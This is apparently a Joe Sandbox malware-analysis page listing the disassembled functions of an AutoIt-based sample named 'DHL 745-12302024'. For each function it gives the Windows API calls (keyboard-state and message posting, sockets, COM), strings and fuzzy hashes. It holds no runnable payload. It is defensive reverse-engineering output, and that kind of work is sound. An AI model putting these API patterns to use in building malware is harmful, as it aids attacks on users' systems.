Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 37f299730a5052ea5450de51e322a46877a61acd875ab71644ad4133ac441b01
Instruction ID: 2bea815704c49c154273956f83bd10c7ae18cc790635147e6c769cbd39930d67
Opcode Fuzzy Hash: 37f299730a5052ea5450de51e322a46877a61acd875ab71644ad4133ac441b01
Instruction Fuzzy Hash: 1C414D31208640BEC7349B7DCD987BA7BE5AB46320F18C53CE26F57561D631AA81CB11

Function 00AC5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00AC5637
_memcmp.LIBVCRUNTIME ref: 00AC5659
_memcmp.LIBVCRUNTIME ref: 00AC5671
_memcmp.LIBVCRUNTIME ref: 00AC5684
_memcmp.LIBVCRUNTIME ref: 00AC569E
_memcmp.LIBVCRUNTIME ref: 00AC56B1
_memcmp.LIBVCRUNTIME ref: 00AC56C9
_memcmp.LIBVCRUNTIME ref: 00AC56E4

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 5a41b558491564930436a3443f63ee87e181357de916687b530cca8ef43bfef4
Instruction ID: dd418ac82d1fc40226d2dc196f101e24dcc17972d8318f5238c5c2fbb07c43af
Opcode Fuzzy Hash: 5a41b558491564930436a3443f63ee87e181357de916687b530cca8ef43bfef4
Instruction Fuzzy Hash: B321A771E40A197BD614A6318E82FBA335CFF21384F490428FE049E581FB21FD9282A9

Function 00AE4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00AE5007
NULL Pointer assignment, xrefs: 00AE502E, 00AE5383

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 71a078e74f1b28fa022929d9f1ca24ab458e6c1a5fa12a853c296be5469253f4
Instruction ID: f22627fe173b9db778488b33145abc43deefa1e4ea282ecfd3daab344124d874
Opcode Fuzzy Hash: 71a078e74f1b28fa022929d9f1ca24ab458e6c1a5fa12a853c296be5469253f4
Instruction Fuzzy Hash: F1D10371E0064AAFDF10CFA9D880FAEB7B5BF48348F148169E915AB281E370DD41CB90

Function 00AA1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AA17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AA15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AA17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AA17FB,?,00AA17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AA17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA16FB

Part of subcall function 00A93820: RtlAllocateHeap.NTDLL(00000000,?,00B31444,?,00A7FDF5,?,?,00A6A976,00000010,00B31440,00A613FC,?,00A613C6,?,00A61129), ref: 00A93852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AA17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1777
__freea.LIBCMT ref: 00AA17A2
__freea.LIBCMT ref: 00AA17AE

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0deb1882c196499c2bfe473a42852a06fc7229ce110c209e91ef0dbe5027b62b
Instruction ID: 9e0ceb9b2616b95ddb0b5b5014961ac597fe149a6cda3f4beafd9f3151e6f957
Opcode Fuzzy Hash: 0deb1882c196499c2bfe473a42852a06fc7229ce110c209e91ef0dbe5027b62b
Instruction Fuzzy Hash: 62919272E00216BADF259FA4C981EEEBBF59F4A710F184659E802E71C1EB35DD41CB60

Function 00AE4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE4648
VariantInit.OLEAUT32(?), ref: 00AE4749
VariantClear.OLEAUT32(?), ref: 00AE4753
VariantClear.OLEAUT32(?), ref: 00AE47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00AE472C
Null Object assignment in FOR..IN loop, xrefs: 00AE45D8, 00AE4706, 00AE47BE

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 35b4c0fc0c14c28ef86b9550366a4173a3ebe15dc2cfacf56eb6acd4d9b2e6f4
Instruction ID: d818940bd6670d1cc4f3bedc275ddcdb55b6a2cc74978ea0e2fca82f47f60d4d
Opcode Fuzzy Hash: 35b4c0fc0c14c28ef86b9550366a4173a3ebe15dc2cfacf56eb6acd4d9b2e6f4
Instruction Fuzzy Hash: 13917071A00259AFDF20CFA6D848FAEBBBCEF4A715F108559F505AB280D7709945CFA0

Function 00AD1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00AD125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00AD12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AD12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AD135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AD13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00AD1430

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: dcddbf38fd6dbc95068d8c671bec2862b370a92deb9aa7372f26d7b1e3df92ea
Instruction ID: 2cd327d90aebae3ddac9f0c449dae288cdcdb71a9dd232d2ac50fcb4c7338e62
Opcode Fuzzy Hash: dcddbf38fd6dbc95068d8c671bec2862b370a92deb9aa7372f26d7b1e3df92ea
Instruction Fuzzy Hash: 9591D2B5A00208AFDB00DF98C884BFEB7B5FF45725F10442AE912EB391D775A941CB90

Function 00A7948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b8aaef6ee87b6e87da27ff61e4310d8ce2181ac353738d4d6f4a2b4364839ccd
Instruction ID: ed86776b2b7ad15a6912babe9139210514b004203f4b5a7db44eecd689771354
Opcode Fuzzy Hash: b8aaef6ee87b6e87da27ff61e4310d8ce2181ac353738d4d6f4a2b4364839ccd
Instruction Fuzzy Hash: 5E912771D40219EFCB10CFA9CD84AEEBBB8FF89320F148556E519B7251D774A942CB60

Function 00AE3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE396B
CharUpperBuffW.USER32(?,?), ref: 00AE3A7A
_wcslen.LIBCMT ref: 00AE3A8A
VariantClear.OLEAUT32(?), ref: 00AE3C1F

Part of subcall function 00AD0CDF: VariantInit.OLEAUT32(00000000), ref: 00AD0D1F
Part of subcall function 00AD0CDF: VariantCopy.OLEAUT32(?,?), ref: 00AD0D28
Part of subcall function 00AD0CDF: VariantClear.OLEAUT32(?), ref: 00AD0D34

Strings

Incorrect Parameter format, xrefs: 00AE39A6, 00AE3BA1
AUTOIT.ERROR, xrefs: 00AE3A80, 00AE3A85

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 85d1ccbfe750bd95d92d4900258281c7af6aa4b123f68dc421d7ba3e9baa49f6
Instruction ID: c7fdfa4114ae5bb2f15bb0bd3a301f1e292f6afd7b6388f7e81393a7b5477586
Opcode Fuzzy Hash: 85d1ccbfe750bd95d92d4900258281c7af6aa4b123f68dc421d7ba3e9baa49f6
Instruction Fuzzy Hash: 009155756083459FCB00EF29C58496AB7F4BF88314F14886EF88A9B351DB31EE45CB92

Function 00AE4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00AC000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?,?,00AC035E), ref: 00AC002B
Part of subcall function 00AC000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?), ref: 00AC0046
Part of subcall function 00AC000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?,?), ref: 00AC0054
Part of subcall function 00AC000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00ABFF41,80070057,?), ref: 00AC0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AE4C51
_wcslen.LIBCMT ref: 00AE4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AE4DCF
CoTaskMemFree.OLE32(?), ref: 00AE4DDA

Strings

NULL Pointer assignment, xrefs: 00AE4E23, 00AE4E52

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 0441bd31074c30c21736e8cd3633edf5168c6d0111bb96b03107a9fe5aeb1099
Instruction ID: e74cd04cda2f549df8b824f0c1702bad10630df5d60ce033377a4b13c83adcb5
Opcode Fuzzy Hash: 0441bd31074c30c21736e8cd3633edf5168c6d0111bb96b03107a9fe5aeb1099
Instruction Fuzzy Hash: 10910571D0025DAFDF14DFA5C991AEEB7B8BF08310F10816AE919B7251EB709A45CFA0

Function 00AF20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00AF2183
GetMenuItemCount.USER32(00000000), ref: 00AF21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AF21DD
_wcslen.LIBCMT ref: 00AF2213
GetMenuItemID.USER32(?,?), ref: 00AF224D
GetSubMenu.USER32(?,?), ref: 00AF225B

Part of subcall function 00AC3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3A57
Part of subcall function 00AC3A3D: GetCurrentThreadId.KERNEL32 ref: 00AC3A5E
Part of subcall function 00AC3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC25B3), ref: 00AC3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AF22E3

Part of subcall function 00ACE97B: Sleep.KERNEL32 ref: 00ACE9F3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 10f8f859523d4f34c47e0dd4d3d99df25f0a5766de78f94ea45abb01c9e6dfe4
Instruction ID: 85a5d8b222cf3af3e697c892eb9d9d98704e4b2c311b07f21ca7d42a5849dec0
Opcode Fuzzy Hash: 10f8f859523d4f34c47e0dd4d3d99df25f0a5766de78f94ea45abb01c9e6dfe4
Instruction Fuzzy Hash: 25715D75A00209AFCB10EFA5C945BBEB7B5EF48320F148459F956EB351DB34AE41CB90

Function 00ACAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00ACAEF9
GetKeyboardState.USER32(?), ref: 00ACAF0E
SetKeyboardState.USER32(?), ref: 00ACAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00ACAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 00ACAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 00ACAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00ACB020

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 538966e3546781b54948154ef4d083f7767bab947322f7c1edd0825740846827
Instruction ID: 4cd291e4525a667534a484607d590957c8318bb9c0872dc199f358773431be72
Opcode Fuzzy Hash: 538966e3546781b54948154ef4d083f7767bab947322f7c1edd0825740846827
Instruction Fuzzy Hash: 0051B4A06147D93DFB3693348C46FBA7EE95B06308F09858DE1E5954C3C3A9ACC4D7A2

Function 00ACACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00ACAD19
GetKeyboardState.USER32(?), ref: 00ACAD2E
SetKeyboardState.USER32(?), ref: 00ACAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00ACADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00ACADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00ACAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00ACAE38

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a5f8bbf36e9fb31baa41f81b8311d092c167db5247145f6ee77aa0f8044ebb8b
Instruction ID: 1396518a7b02a5d2d3866c0c513895fa32df572e361282c4eecd325fcc0ac787
Opcode Fuzzy Hash: a5f8bbf36e9fb31baa41f81b8311d092c167db5247145f6ee77aa0f8044ebb8b
Instruction Fuzzy Hash: C85108A16087E93DFB3383748C45FBA7EA85B55308F09848CE1D6968C3D394EC84D7A2

Function 00A9542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00AA3CD6,?,?,?,?,?,?,?,?,00A95BA3,?,?,00AA3CD6,?,?), ref: 00A95470
__fassign.LIBCMT ref: 00A954EB
__fassign.LIBCMT ref: 00A95506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AA3CD6,00000005,00000000,00000000), ref: 00A9552C
WriteFile.KERNEL32(?,00AA3CD6,00000000,00A95BA3,00000000,?,?,?,?,?,?,?,?,?,00A95BA3,?), ref: 00A9554B
WriteFile.KERNEL32(?,?,00000001,00A95BA3,00000000,?,?,?,?,?,?,?,?,?,00A95BA3,?), ref: 00A95584

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1cd4473e5a0e3f400c0c7c8da519c540f39ebebcccc1e2de5c6944736d273d89
Instruction ID: 23cb0cade102f39bea666cddf28f8a49a24c2e90559f19065d77df4863534a62
Opcode Fuzzy Hash: 1cd4473e5a0e3f400c0c7c8da519c540f39ebebcccc1e2de5c6944736d273d89
Instruction Fuzzy Hash: 6451A071E006499FDF11CFB8D886AEEBBF9EF09310F15411AE955E7292D630AA41CB60

Function 00AF6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AF6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00AF6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AF6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00ADAB79,00000000,00000000), ref: 00AF6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AF6CC7

Strings

@U=u, xrefs: 00AF6C73

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID: @U=u
API String ID: 3688381893-2594219639
Opcode ID: 477d800b49db71551aad999d58c8ad25ba42922ded54f3beeb144e3e44f54e12
Instruction ID: 5759e881925adf76237967f56865120bf839abcc5b1e196ca6c34c9812415131
Opcode Fuzzy Hash: 477d800b49db71551aad999d58c8ad25ba42922ded54f3beeb144e3e44f54e12
Instruction Fuzzy Hash: 0E41AF35A04108AFDB24CFA9CD58FB97BA5EB09360F150228FA95E72A1C771AD42CA40

Function 00A82D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A82D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00A82D53
_ValidateLocalCookies.LIBCMT ref: 00A82DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00A82E0C
_ValidateLocalCookies.LIBCMT ref: 00A82E61

Strings

csm, xrefs: 00A82DF6

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 820a2d1a8f35b24985264a6adf7fb2f97d4ed56f5b142f08487184dabcad0fb2
Instruction ID: 572586017095165f2e6e70019413f4a4b2e2275f5f15a421f7cee20a88fa87e7
Opcode Fuzzy Hash: 820a2d1a8f35b24985264a6adf7fb2f97d4ed56f5b142f08487184dabcad0fb2
Instruction Fuzzy Hash: 5E418E35A00209ABCF10FF68C845BAEBFF5BF45324F148155E815AB392D775AA15CBD0

Function 00AE10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE304E: inet_addr.WSOCK32(?), ref: 00AE307A
Part of subcall function 00AE304E: _wcslen.LIBCMT ref: 00AE309B

socket.WSOCK32(00000002,00000001,00000006), ref: 00AE1112
WSAGetLastError.WSOCK32 ref: 00AE1121
WSAGetLastError.WSOCK32 ref: 00AE11C9
closesocket.WSOCK32(00000000), ref: 00AE11F9

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
